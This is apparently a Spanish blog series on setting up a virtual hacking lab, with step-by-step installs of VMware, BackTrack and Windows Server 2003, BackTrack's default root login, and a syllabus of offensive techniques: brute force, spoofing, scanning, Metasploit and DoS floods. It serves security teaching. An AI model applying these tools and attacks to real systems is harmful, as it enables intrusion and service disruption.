Deben recordar que desde la pantalla anterior es posible editar la configuración actual de la nueva máquina, es decir, aumentar el tamaño de memoria RAM, unidades de CD y demás.
Después de tener el CD de instalación de Windows 2003 Server en la unidad de CD, podemos dar la orden de arranque de nuestra máquina virtual.

El proceso de instalación de Windows 2003 Server no presenta mayores diferencias al proceso de instalación de Windows XP Professional o Home Edition, salvo alguna que otra pantalla diferente.

Pasemos a la pantalla de bienvenida.

10 - Aceptamos el contrato de Licencia de Windows con la tecla F8. Cabe recordar que algunas versiones de Windows 2003 Server pueden ser adquiridas por un periodo de prueba no mayor a 180 días. Utilizar versiones no legales de este Sistema Operativo infringe las leyes. Así que es bajo tu propia cuenta y riesgo la utilización de licencias no legales.

11 - Ahora nos muestra las particiones existentes, como ésta es una instalación en limpio no tenemos ninguna partición creada. Damos ENTER para crear la nueva partición.

12 - Procedemos ahora a formatear la nueva partición creada en el paso anterior, para este efecto utilizaremos el sistema de archivos NTFS (rápido) .

13 - Esperamos mientras el programa formatea la nueva partición.

14 - Luego de formatear comienza el proceso de copia de archivos desde el CD a nuestro disco duro.

15 - Pantalla de progreso de instalación. Además nos ofrece información sobre el producto.

16 - Pasamos a la configuración regional y de idioma.

17 - Personalización de software – Nombre del sistema u organización.

18 - En este paso debemos ingresar el número de serie adquirido con Microsoft Corp. Si la versión instalada es un trial de 180 días debemos ingresar el serial que nos fué enviado por correo electrónico.

19 - Seleccionamos ahora el tipo de licencia a utilizar, para este laboratorio utilizaremos la del tipo “por servidor” habilitando 5 conexiones simultáneas.

20 - En esta pantalla debemos ingresar el nombre para nuestro equipo. Así mismo asignaremos una contraseña para el usuario Administrador. Según las políticas de seguridad de una buena contraseña, esta debe estar compuesta por 4 letras mayúsculas, 4 minúsculas y 4 números. Si no asignamos este tipo de contraseña recibiremos una ventana de advertencia, pero igual podemos pasarla por alto.

21 - Podemos ahora seleccionar el tipo de configuración de red. Contamos con dos opciones: Configuración típica y configuración personalizada. Para este caso, seleccionaremos configuración típica.

22 - Podemos continuar con la configuración de dominio o de grupo de trabajo. Para este caso: GRUPO_TRABAJO.

23 - Terminados estos pasos se reiniciara la máquina. Aparaciendo por fin la pantalla de login a nuestro sistema operativo Windows 2003 Server.

24 - Primer acceso al sistema Windows 2003 Server Enterprise Edition

25 - Veamos ahora como podemos instalar componentes adicionales de Windows. Desde el CD de instalación de windows 2003 Server.

26 - Doble clic en el CD de instalación. Veremos la siguiente pantalla.

27 - Las siguientes imagenes presentan de manera rápida los componentes a instalar. En otras sesiones del laboratorio profundizaremos sobre los mismos.

28 - Proceso de instalación de los componentes adicionales.

29 - Después de instalar estos componentes, se nos pide reiniciar el equipo . Clic en si.

30 - Luego de reiniciar la máquina probamos la conexión a internet. Además hacemos una pequeña prueba de acceso a nuestro servidor Web local IIS 6.0.

Termina de esta manera la segunda sesión laboratorio, hagamos un recuento de lo aprendido.

- Creación de la segunda máquina virtual.
- Instalación de Windows 2003 Server Enterprise Edition.

Próxima sesión:
Instalación de VMware Tools.

Taller libre:
Otras alternativas de virtualización.
El taller pretende dejar al investigador algún tipo de consulta o práctica de desarrollo individual. Para el primer taller dejo la consulta sobre otros sistemas de virtualización.

El sistema software de virtualización será el mismo utilizado en el libro citado anteriormente: VMware Workstation, para este caso la versión 6.0 y versión 5.5. Recordar además que es posible utilizar una versión de prueba de este aplicativo por 30 días. Clic para tener más información del programa y llevar a cabo la descarga del mismo – Versión 6.0.1 – Versión 5.5

El sistema utilizado como host (donde instalaré el VMware), será una máquina con las siguientes especificaciones técnicas, aunque el programa puede correr con máquinas de más baja capacidad, para más información del aplicativo visitar la página oficial del producto

El proceso de instalación de este aplicativo no varía y no presenta mayor diferencia a casi la totalidad de instalaciones en entornos Windows, otro aplicativo más que se instala con los típicos “siguiente-siguiente”, solo debe prestarse atención en el momento en que pide confirmar la deshabilitación del autorun de CD’s, esto con el fin de evitar salir abruptamente de la máquina virtual cuando insertamos algún CD.

Para finalizar, solo recordar que el llevar estas técnicas y contramedidas a un laboratorio es idea original del especialista y autor del libro “Practical Hacking Techniques and Countermeasures” – Mark D. Spivey. Yo trato simplemente de actualizar un poco el contenido, traducir, adaptar e interpretar de la mejor manera, haciendo ver estos laboratorios de un modo más simple a como los presenta el autor, en nuestro idioma y profundizando en los temas que tengo experiencia.

Luego de instalar el VMware y haber reiniciado el equipo procedemos entonces a ejecutar el programa (doble clic en alguno de los accesos creados por la instalación), para poder llevar a cabo el proceso de instalación de las máquinas virtuales.

Comenzaremos entonces con la instalación de la distribución BackTrack. Esta distribución live cd especializada en temas relacionados con la seguridad de la información también puede ser instalada como S.O residente, será esta entonces nuestra opción de Sistema Operativo residente tipo *nix, aprenderemos así como arrancar la live cd y como llevar a cabo la instalación de la misma para que podamos seguir haciendo uso de ella.

Nota: Las capturas de pantalla son desarrolladas de la manera más clara e informátiva posible, señalando con recuadros azules los puntos de especial interés.

Máquina virtual para la distribución BackTrack

Requerimientos: Imagen iso o CD de la distribución BackTrack – Disponibles en el sitio web de descargas del proyecto – Seleccionar el origen de la imagen iso desde cualquiera de los mirrors disponibles.

1 - Clic en nueva máquina virtual

2 - En el cuadro de diálogo, clic en siguiente.

3 - Aceptar la configuración típica de la nueva máquina virtual – Cada investigador puede profundizar en cada una de las diferentes opciones que aparecen en pantalla, para efectos de mejor personalización y apropiación de sus laboratorios.

4 - Seleccionar como sistema operativo invitado: Linux; versión: Otro Linux

5 - En este paso es posible asignar un nombre a nuestra máquina virtual, además de una ruta de almacenamiento de la misma.

6 - Pasamos de este modo a la pantalla de configuración de nuestro tipo de red. Tenemos 4 opciones disponibles para este efecto. Una breve descripción de estas opciones será la siguiente:

- Use bridged networking: Nuestra máquina virtual tomará una IP propia y con esta será identificada en internet.

- Use network address translation (NAT- Traducción de dirección de red): Nuestra máquina virtual tomará la misma IP que nuestra máquina host, haciendo posible la conexión a internet con esta identificación, además de permitirnos crear pequeñas redes virtuales, objetivo primordial de nuestros laboratorios.

- Use host-only networking: Conecta nuestra máquina virtual a una red privada virtual en nuestro sistema host.

- Do not use a network connection: No usar conexiones de red.

Para nuestros laboratorios utilizaremos en mayor medida la opción ofrecida mediante el acceso NAT, escojemos entonces este campo.

7 – Ahora seleccionamos el tamaño de nuestro disco duro virtual. El tamaño por defecto puede variar según el tamaño real de tu DD, para nuestro sistema BackTrack es suficiente con 4.0 Gigas, las dos opciones adicionales en pantalla:
Allocate all disk space now: Nos permite asignar desde un comienzo este espacio real a nuestro disco virtual, mientras que, dejando sin seleccionar esta opción el espacio será ocupado a medida que se haga necesario para la máquina virtual.
Split disk into 2 GB files: Permite dividir el espacio asignado en pequeñas particiones de 2 GB.

Para esta máquina dejaremos las opciones asignadas por defecto. Recuerdo de nuevo que cada investigador puede profundizar en cada una de las opciones ofrecidas por el aplicativo de virtualización. Para más información estudiar la documentación del producto.

Con estos sencillos paso hemos creado nuestra primera máquina virtual del laboratorio. La captura de pantalla nos muestra el nombre que le asignamos en pasos anteriores, ubicación e información de los dispositivos.

Pasemos ahora a la carga de nuestra LiveCD BackTrack, para su posterior instalación.

Dependiendo de la opción de grabación de la imagen iso, podremos arrancar la misma desde la unidad de CD virtual o desde la imagen iso. – Esta opción puede seleccionarse dando doble clic en CD-ROM (IDE), usar drive físico (imagen grabada de la distro), ó usando imagen iso (seleccionar, buscar y aceptar-ok).

Clic en Start this virtual machine el panel Commands.

8 - Cargará la BIOS de nuestra máquina virtual.

9 - Comienza el sistema de booteo de backTrack.

10 - Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de login. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.

11 - Para logearnos en el sistema ingresamos:
usuario: root
contraseña: toor

12 - Como desde un comienzo seleccionamos la opción de acceso a la red mediante NAT, podemos observar gracias al comando ifconfig nuestras interfaces de redes.

13 - Luego podemos cargar el entorno gráfico de BackTrack mediante el siguiente comando:
startx

14 - Entorno gráfico cargando.

15 - BackTrack cargado como Live CD en su totalidad.

16 - Ahora nos encargaremos de instalar como S.O residente la distribución Live CD, para este efecto debemos como primera medida particionar el disco duro, para llevar a cabo este proceso utilizaremos la utilidad QTParted disponible en la misma distribución BackTrack.
Para encontrar de manera rápida esta utilidad es posible hacer uso de la herramienta buscar, en el menu desplegable de BackTrack, allí debemos ingresar el nombre de la utilidad QTParted, en la ubicación file:/usr, en no más de 5 segundos encontrará la utilidad, procedemos a darle doble clic en el archivo qtparted ubicado en el subdirectorio sbin/

17 - Ejecutamos la utilidad QTParted en su versión 0.4.4, seleccionamos el disco duro a particionar.

18 - Clic derecho para crear las particiones, como primera partición seleccionaremos la del tipo de partición linux-swap, con un tamaño de 256 MB.

19 - Luego otra partición del tipo ext3, con un tamaño de 3.74 GB.

20 - Luego de asignar las futuras particiones procedemos a guardar los cambios.

21 - Antes de llevar a cabo las particiones recibiremos un mensaje de advertencia sobre los riesgos de las acciones a realizar, este riesgo esta directamente relacionado con la perdidad de datos, como es una instalación en limpio no perderemos ningún dato. Aprovamos los cambios a realizar.

22 – Después de un corto proceso de operaciones, recibiremos el mensaje de completado del particionamiento . Clic en OK para salir de la utilidad QTParted.

23 - Después de particionar el disco duro procederemos a montar las nuevas particiones desde la linea de comandos (shell), también disponible de manera directa desde la barra de tareas de BackTrack.

24 – Ejecutamos la herramienta disponible en BackTrack (BackTrack installer), para instalar la distribución como S.O, residente. Para el laboratorio seleccionaré el método de instalación real , lueg, clic en Install.

25 - Proceso de instalación de BackTrack.

26 - Instalación completa, clic en cerrar.

27 - Procedemos en este momento a reiniciar nuestra máquina virtual.

28 - Teclas Ctrl + Alt + Supr, para reiniciar la máquina, recordar sacar el CD de BackTrack, para que cargue nuestro nuevo S.O desde el disco duro.

29 - Después de reiniciar la máquina podemos disfrutar de la distribución BackTrack como sistema residente.

30 - Probando el acceso a internet desde BackTrack.

Termina de esta manera la primera sesión laboratorio, hagamos un recuento de lo aprendido.

- Introducción y descripción de los laboratorios.
- Recursos necesarios para los laboratorios.
- Instalación del aplicativo software de virtualización VMware.
- Creación de la primera máquina virtual.
- Instalación de BackTrack como S.O residente.

Próxima sesión:
Instalación de Windows Server 2003 Edición Enterprise

Algunas notas aclaratorias:

Los términos utilizados en los laboratorios referentes a “hacking”, “hacker”, etc, son bajo la definición de especialistas en seguridad y sistemas informáticos. Muy diferente a la definición que dan algunos medios de información, relacionandolos con delincuentes. Para mí (apreciación personal), las personas que se dedican a causar estragos, robos, y demás actos, reciben la denominación de delincuentes informáticos; (personas que realizan actos delictivos mediante la utilización de herramientas informáticas).

El contenido temático de los laboratorios estará dirigido para usuarios con un nivel de conocimientos del tema comprendido entre básico y medio. El material expuesto no está enfocado para usuarios de amplia experiencia en el tema, por el contrario pretende acercar a los entusiastas de aprender y que aún no encuentran la manera de comenzar de un modo más práctico. Pretende refrescar un poco los conocimientos de usuarios avanzados, y pretende invitar a los mismos a desarrollar sus propios laboratorios para el conocimiento de toda la comunidad investigadora.
Los laboratorios pretenden ser lo más práctico posible, obviamente citando las fuentes de profundización para obtener más información sobre los temas tratados.
Casi la totalidad de los laboratorios serán llevados a cabo bajo entornos controlados de instrusión, utilizando máquinas virtuales, con diferentes sistemas operativos, entre ellos “BackTrack”, “OpenSuSe Linux”, “Windows Server 2003 Edición Enterprise”, “NetBSD”, entre otros.

Contenido:

• Introducción y descripción de los laboratorios.

Instalación y configuración del ambiente virtual controlado de los laboratorios. (Instalación de VMware WorkStation – Instalación de la distribución BackTrack – Instalación de Windows 2003 Server Enterprise Edition – Instalación de las VMware Tools)

• Identificación de Banner’s (banderas)

Descripción y definición de la identificación de banner’s (utilización de las herramientas y procedimientos: telnet, netcat, Scanline, Xprobe2, AMAP y banner.c, para la identificación de banner’s.)

• Enumeración del objetivo

Descripción y definición del target enumeration (utilización de las herramientas y procedimientos: nullsesion, getmac, user2sid, sid2user, userdump, userinfo, dumpsec, comandos net, ping’s, pathping’s, nmap, nmapfe, nslookup, nmblookup, rpcinfo, visual route, sam spade, netcraft, sprint y winfingerprint, para la enumeración del objetivo).

• Escaneo

Descripción y definición del scanning (utilización de las herramientas y procedimientos: Angry IP, LANguard, Fscan, Passifist, Lanspy, Netcat, Superscan, Strobe, FTPScanner, TCS CGI Scanner, Hydra, WGateScan/ADM Gates, para las diferentes técnicas de escaneo) .

• Sniffing

Descripción y definición del sniffing (utilización de las herramientas y procedimientos: Ethereal-Wireshark, Ngrep, TcpDump, WinDump, IPDump2, ZxSniffer y Sniffit, para las diferentes ténicas del sniffing)

• Spoofing

Descripción y definición del spoofing (utilización de las herramientas y procedimientos: RafaleX, SMAC y Packit, para las diferentes técnicas del spoofing).

• Ataques de fuerza bruta

Descripción y definición del brute force (utilización de las herramientas y procedimientos: NETWOX/NETWAG, FGDump, LC, Cain, CHNTPW, John the ripper, BruteFTP y TSGrinder II, para las diferentes técnias de brute force).

• Escaneo de vulnerabilidades

Descripción y definición del Vulnerability Scanning (utilización de las herramientas y procedimientos: SAINT, NETWOX/NETWAG, Solar Winds, Retina, X-scan, SARA, N-Stealth, Pluto, Metasploit, Nikto, SSS, Cerberus, AutoScan, Nessus y Core Impact, para las diferentes técnicas del vulnerability scanning).

• Redireccionamiento

Descripción y definición de la redirección (utilización de las herramientas y procedimientos: PortMapper, EliteWrap, Fpipe, PsExec y NETWOX/NETWAG, para las diferentes técnicas de la redirección) .

• Denegación del Servicio (DoS)

Descripción y definición de la Denegación del Servicio (utilización de las herramientas y procedimientos: Land Attack, Smurf Attack, SYN Attack, UDP Flood y Trash 2.c, para las diferentes técnicas de Denegación del Servicio).